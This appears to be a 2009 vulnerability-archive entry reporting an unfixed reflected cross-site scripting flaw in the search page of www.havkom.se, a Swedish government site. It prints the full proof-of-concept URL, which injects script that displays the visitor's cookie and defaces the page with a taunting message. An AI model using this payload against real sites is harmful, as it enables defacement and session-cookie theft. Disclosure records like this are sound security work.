Security researcher DellNull submitted a cross-site scripting (XSS) vulnerability affecting www.havkom.se on 15/05/2009. At the time of submission, the site ranked 7162581 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 15/05/2009 |
Date published: 11/06/2009 |
Status: UNFIXED |
Author: DellNull |
Domain: www.havkom.se |
Category: XSS |
Pagerank: 7162581 |
URL: http://www.havkom.se/textsearch.asp?SearchText=%3CSCRIPT%3E%3C/SCRIPT%3E%3CSCRIPT%3Ealert(%27This%20 is%20a%20cookie%20from%20the%20Swedish%20Accident%20Investigation%20Team!\n%27+document.cookie);%3C/ SCRIPT%3E%3Ch1%3E%3Cfont%20color=%22red%22%20size=%22+5%22%3EAccident%20Investigation%20Team!%3Cbr%3 EInvestigate%20this!!!%20,%20see%20%3Ca%20href%20=%27http://xssed.com/search?key=havkom.se%27%3Ehttp ://xssed.com/search?key=havkom.se%3C/a%3E%20It%27s%20a%20shame%20that%20a%20government%20authority%2 0is%20prone%20to%20security%20flaws%20in%20their%20systems!%20What%20if%20someone%20places%20a%20xss %20proxy%20hook%20(like%20BeEF)%20here?%20The%20privacy%20for%20swedish%20citizens%20is%20supposed%2 0to%20be%20protected%20by%20constitutional%20laws.%20So%20live%20by%20the%20law%20or%20die%20by%20th e%20law%3Cbr%3E%3Cbr%3E-%20DellNull%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cimg%20src=%27http://www.kinetics.co.nz /SiteCollectionImages/CrashTestDummy.jpg%27%3E%3C/font%3E%3C/script%3E |